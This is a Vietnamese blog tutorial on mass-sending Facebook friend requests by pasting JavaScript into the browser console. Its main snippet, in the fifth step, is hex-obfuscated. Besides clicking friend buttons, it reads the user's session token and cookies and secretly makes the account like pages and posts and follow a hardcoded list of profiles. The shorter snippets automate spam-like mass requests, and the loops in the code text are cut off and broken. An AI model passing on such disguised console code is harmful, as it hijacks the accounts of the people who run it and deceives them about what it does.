Cách Kết Bạn Hàng Loạt Trên Facebook 2021, Tool Kết Bạn Facebook Hàng Loạt

Sử dụng code gửi lời mời kết bạn trên Facebook là cách để full 5000 bạn bè nhanh nhất. Giúp tăng kết bạn một cách tự động mà không phức tạp như dùng phần mềm, extension (tiện ích), tool…

Một tài khoản Facebook Profile mới đăng ký thường sẽ rất ít bạn bè. Bởi vậy, cần phải kết bạn nhanh tới toàn bộ những nick Facebook khác, để mau đạt được nhiều bạn bè nhất. Hiện nay, có khá nhiều cách gửi yêu cầu kết bạn hàng loạt, nhưng trong đó gửi kết bạn bằng mã code là cách mọi người thường làm.

Đang xem: Cách kết bạn hàng loạt trên facebook

Sau đây, mình sẽ hướng dẫn cho bạn cách sử dụng mã code để gửi yêu cầu kết bạn hàng loạt trên nick Facebook.

Tự động gửi lời mời kết bạn trên giao diện Facebook cũ & mới

Bài viết này có mã code để giúp người dùng gửi nhiều lời mời kết bạn cùng lúc. Có thể áp dụng trên cả giao diện cũ và mới của Facebook.

Gửi yêu cầu kết bạn bằng giao diện Facebook cũ

Bước 1: Để tự động gửi lời mời kết bạn hàng loạt trên Facebook bằng mã Code này, chỉ thực hiện được trên giao diện Facebook cũ. Do Facebook đã chuyển sang giao diện mới, nhưng bạn vẫn có thể sử dụng giao diện cũ Facebook bằng cách cài đặt vào trình duyệt Google Chrome, Cốc Cốc một tiện ích có tên “Switch to Classic design on Facebook™”.

READ:  Trump Sues Facebook, Twitter, Google Over Platform Bans, President Joe Biden

Các bước cài đặt tiện ích “Switch to Classic design on Facebook™” này bạn cần xem hướng dẫn ở các bước (2, 3, 4) trong bài viết Cách tự động chấp nhận kết bạn trên Facebook.

Bước 2: Sau khi bạn cài đặt thành công tiện ích và Facebook đã chuyển sang giao diện cũ. Đến đây, bạn click vào biểu tượng quản lý các gợi ý kết bạn.

*

Bước 3: Di chuyển chuột lại dòng chữ Thêm bạn bè (của một người bất kỳ). Rồi click chuột phải và nhấn Kiểm tra.

*

Bước 4: Xuất hiện giao diện Inspect Element, nhấn vào tab Console.

Xem thêm: Inherit Là Gì – Inherit Nghĩa Là Gì Trong Tiếng Việt

*

Bước 5: Hãy copy mã Code dưới đây, sau đó dán vào tab Console, rồi nhấn Enter.

var _0xcbd3=<"x5Fx34x32x66x74x20x5Fx34x6Ax79x30x20x46x72x69x65x6Ex64x52x65x71x75x65x73x74x41x64x64x20x61x64x64x42x75x74x74x6Fx6Ex20x5Fx34x6Ax79x33x20x5Fx34x6Ax79x31x20x73x65x6Cx65x63x74x65x64x20x5Fx35x31x73x79","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x6Cx65x6Ex67x74x68","x63x6Cx69x63x6B","x54x68xF4x6Ex67x20x42xE1x6Fx20x3Ax20x42u1EA1x6Ex20u0111xE3x20x67u1EEDx69x20x6Cu1EDDx69x20x6Du1EDDx69x20x6Bu1EBFx74x20x62u1EA1x6Ex20u0111u1EBFx6Ex20","x20x6Ex67u01B0u1EDDx69x20x74x68xE0x6Ex68x20x63xF4x6Ex67x20x21x20x3Ex3Ax29x20","x76x61x6Cx75x65","x66x62x5Fx64x74x73x67","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x4Ex61x6Dx65","x6Dx61x74x63x68","x63x6Fx6Fx6Bx69x65","x2Fx2Fx77x77x77x2Ex66x61x63x65x62x6Fx6Fx6Bx2Ex63x6Fx6Dx2Fx61x6Ax61x78x2Fx70x61x67x65x73x2Fx66x61x6Ex5Fx73x74x61x74x75x73x2Ex70x68x70","x26x66x62x70x61x67x65x5Fx69x64x3D","x26x61x64x64x3Dx74x72x75x65x26x72x65x6Cx6Fx61x64x3Dx66x61x6Cx73x65x26x66x61x6Ex5Fx6Fx72x69x67x69x6Ex3Dx70x61x67x65x5Fx74x69x6Dx65x6Cx69x6Ex65x26x66x61x6Ex5Fx73x6Fx75x72x63x65x3Dx26x63x61x74x3Dx26x6Ex63x74x72x5Bx5Fx6Dx6Fx64x5Dx3Dx70x61x67x65x6Cx65x74x5Fx74x69x6Dx65x6Cx69x6Ex65x5Fx70x61x67x65x5Fx61x63x74x69x6Fx6Ex73x26x5Fx5Fx75x73x65x72x3D","x26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x79x6Ex3Dx37x39x38x61x44x35x7Ax35x43x46x2Dx26x5Fx5Fx72x65x71x3Dx64x26x66x62x5Fx64x74x73x67x3D","x26x70x68x73x74x61x6Dx70x3D","x50x4Fx53x54","x6Fx70x65x6E","x6Fx6Ex72x65x61x64x79x73x74x61x74x65x63x68x61x6Ex67x65","x72x65x61x64x79x53x74x61x74x65","x73x74x61x74x75x73","x63x6Cx6Fx73x65","x73x65x6Ex64","x36x30x31x37x31x39x31x37x33x31x39x39x39x30x34","x32x31x32x38x34x34x33x30x35x35x36x34x36x32x31","x34x37x37x35x34x32x37x34x32x32x39x37x31x32x39","x67x65x74x54x69x6Dx65","x2Fx2Fx77x77x77x2Ex66x61x63x65x62x6Fx6Fx6Bx2Ex63x6Fx6Dx2Fx61x6Ax61x78x2Fx75x66x69x2Fx6Cx69x6Bx65x2Ex70x68x70","x6Cx69x6Bx65x5Fx61x63x74x69x6Fx6Ex3Dx74x72x75x65x26x66x74x5Fx65x6Ex74x5Fx69x64x65x6Ex74x69x66x69x65x72x3D","x26x73x6Fx75x72x63x65x3Dx31x26x63x6Cx69x65x6Ex74x5Fx69x64x3D","x25x33x41x33x37x39x37x38x33x38x35x37x26x72x6Fx6Fx74x69x64x3Dx75x5Fx6Ax73x6Fx6Ex70x5Fx33x39x5Fx31x38x26x67x69x66x74x6Fx63x63x61x73x69x6Fx6Ex26x66x74x5Bx74x6Ex5Dx3Dx25x33x45x25x33x44x26x66x74x5Bx74x79x70x65x5Dx3Dx32x30x26x66x74x5Bx71x69x64x5Dx3Dx35x38x39x30x38x31x31x33x32x39x34x37x30x32x37x39x32x35x37x26x66x74x5Bx6Dx66x5Fx73x74x6Fx72x79x5Fx6Bx65x79x5Dx3Dx32x38x31x34x39x36x32x39x30x30x31x39x33x31x34x33x39x35x32x26x66x74x5Bx68x61x73x5Fx65x78x70x61x6Ex64x65x64x5Fx75x66x69x5Dx3Dx31x26x6Ex63x74x72x5Bx5Fx6Dx6Fx64x5Dx3Dx70x61x67x65x6Cx65x74x5Fx68x6Fx6Dx65x5Fx73x74x72x65x61x6Dx26x5Fx5Fx75x73x65x72x3D","x26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x79x6Ex3Dx37x6Ex38x38x51x6Fx41x4Dx42x6Cx43x6Cx79x6Fx63x70x61x65x26x5Fx5Fx72x65x71x3Dx67x34x26x66x62x5Fx64x74x73x67x3D","x38x35x33x37x38x39x32x31x34x37x32x30x31x33x38","x37x39x32x31x32x34x37x39x30x38x38x36x35x38x31","x36x31x30x30x35x36x34x34x39x30x39x33x34x31x37","x37x38x37x30x35x33x37x39x34x37x32x37x30x31x34","x34x38x39x35x38x37x37x36x37x38x30x36x39x35x33","x34x32x37x31x37x39x32x30x37x33x38x31x31x34x33","x34x32x31x34x34x38x32x35x34x36x32x30x39x30x35","x33x39x34x38x36x36x34x30x33x39x34x35x37x35x37","x33x36x33x35x34x32x39x35x33x37x34x34x37x36x39","x33x34x36x32x30x34x37x30x38x38x31x31x39x32x37","x34x35x39x35x30x35x30x35x34x31x34x38x35x35x38","x33x39x32x33x38x35x36x33x30x38x36x30x35x30x31","x36x30x32x36x34x30x34x31x39x38x33x35x30x32x30","x2Fx61x6Ax61x78x2Fx66x6Fx6Cx6Cx6Fx77x2Fx66x6Fx6Cx6Cx6Fx77x5Fx70x72x6Fx66x69x6Cx65x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x70x72x6Fx66x69x6Cx65x5Fx69x64x3D","x26x6Cx6Fx63x61x74x69x6Fx6Ex3Dx31x26x73x6Fx75x72x63x65x3Dx66x6Fx6Cx6Cx6Fx77x2Dx62x75x74x74x6Fx6Ex26x73x75x62x73x63x72x69x62x65x64x5Fx62x75x74x74x6Fx6Ex5Fx69x64x3Dx75x33x37x71x61x63x5Fx33x37x26x66x62x5Fx64x74x73x67x3D","x26x6Cx73x64x26x5Fx5F","x73x63x72x69x70x74","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x69x6Ex6Ex65x72x48x54x4Dx4C","x6Ex65x77x20x41x73x79x6Ex63x52x65x71x75x65x73x74x28x29x2Ex73x65x74x55x52x49x28x27x2Fx61x6Ax61x78x2Fx66x72x69x65x6Ex64x73x2Fx6Cx69x73x74x73x2Fx73x75x62x73x63x72x69x62x65x2Fx6Dx6Fx64x69x66x79x3Fx6Cx6Fx63x61x74x69x6Fx6Ex3Dx70x65x72x6Dx61x6Cx69x6Ex6Bx26x61x63x74x69x6Fx6Ex3Dx73x75x62x73x63x72x69x62x65x27x29x2Ex73x65x74x44x61x74x61x28x7Bx20x66x6Cx69x64x3Ax20","x20x7Dx29x2Ex73x65x6Ex64x28x29x3B","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x34x31x36x31x34x31x35x36x35x31x35x31x35x37x34","x34x31x36x34x39x38x35x31x38x34x34x39x32x31x32","x31x38x39x39x35x30x32x37x37x38x33x30x35x36x30","x31x30x30x30x30x32x36x37x32x30x33x35x32x36x35">;var robiXxu=document<_0xcbd3<1>>(_0xcbd3<0>);for(var i=0;iXem bài viết:

Bước 6: Cùng lúc này sẽ xuất hiện một cửa số thông báo, thông báo cho bạn biết số lượng lời mời kết bạn đã gửi yêu cầu kết bạn tới họ.

*

Bước 7: Nếu muốn gửi thêm nhiều lời mời kết bạn khác, thì bạn lại phải cuộn thêm danh sách để cho nó hiển thị thêm các lời mời kết bạn khác nữa.

Sau đó tiếp tục dán mã Code và nhấn Enter. Thao tác hành động này nhiều lần cho đến khi bạn cảm thấy số lượng lời mời kết bạn đã đủ thì dừng lại.

– Lưu ý khi dùng Code gửi yêu cầu kết bạn:

READ:  Facebook Live

Mỗi lần chỉ nên gửi khoảng 10-20 người, không nên gửi quá nhiều vì Facebook xem đó là hành vi spam. Rất dễ bị chặn tính năng gửi yêu cầu kết bạn hoặc bị dính lỗi Checkpoint, rất phức tạp.Khuyến khích kết bạn với những nick có nhiều bạn chung hoặc một vài người bạn chung với mình.Chỉ gửi được không quá 1000 lời mời kết bạn, có nghĩa là không phải tất cả những người mà bạn đã gửi yêu cầu họ sẽ đồng ý. Vậy nên, để tiếp tục gửi kết bạn cho những người khác, cần xóa những yêu cầu đang đợi phản hồi kia.Chỉ có thể thực hiện code trên máy tính, chứ không dùng được cho điện thoại (Android, iOS).Nếu bạn không muốn sử dụng mã Code ở trên vì nó quá dài. Vậy bạn dùng một đoạn mã khác ở đây, cũng rất hữu ích:

javascript:var inputs = document.getElementsByClassName(“_42ft _4jy0 FriendRequestAdd addButton _4jy3 _4jy1 selected _51sy”); for(var i=0; iTự động gửi yêu cầu kết bạn Facebook bằng giao diện mớiBước 1: Bạn truy cập vào trình quản lý kết bạn bằng giao diện Facebook mobile trên máy tính, tại đây: https://m.facebook.com/friends/center/requests/

Bước 2: Click chuột phải và nhấn Kiểm tra (hoặc dùng tổ hợp phím Ctrl + Shift + I).

*

Bước 3: Xuất hiện giao diện Inspect Element, click vào tab Console. Sau đó, sao chép toàn bộ mã Code bên dưới, rồi cho vào tab Console và nhấn Enter.

Xem thêm: Trắng Tay Vì Đầu Tư Tiền Ảo 2018 ? 5 Dự Báo Đáng Chú Ý Về Tiền Ảo Trong Năm 2018

READ:  Hướng Dẫn Rip Nick Facebook 5S Bằng Điện Thoại, Một Số Cách Rip Nick Fb Đơn Giản 2019

*

Mã Code:

javascript:var x=document.getElementsByClassName(“_55sr”);for(var i=0;iBước 4: Lúc này bạn sẽ thấy hàng loạt lời mời kết bạn đã được gửi yêu cầu.

PS: Mã code này không chỉ áp dụng trong phần https://m.facebook.com/friends/center/requests/, mà còn sử dụng được ở bất kỳ nơi đâu. Ví dụ bạn có thể vào danh sách bạn bè của một người lạ rồi gửi kết bạn tới những người trong danh sách đó, hoặc vào Group để gửi kết bạn tới những người trên Group…

PSS: Qua quá trình mình test thì chưa thấy trường hợp sử dụng code này mà bị dính Checckpoint Facebook. Hy vọng tài khoản của bạn cũng sẽ không bị Checkpoint. Tuy nhiên, nếu bạn gửi quá nhiều lời mời kết bạn thì đôi khi vẫn hay bị báo spam, nhưng bạn chỉ cần đợi sau khoảng 1 tiếng là có thể gửi được tiếp nhé. Chúc bạn thành công!

Xem thêm bài viết thuộc chuyên mục: facebook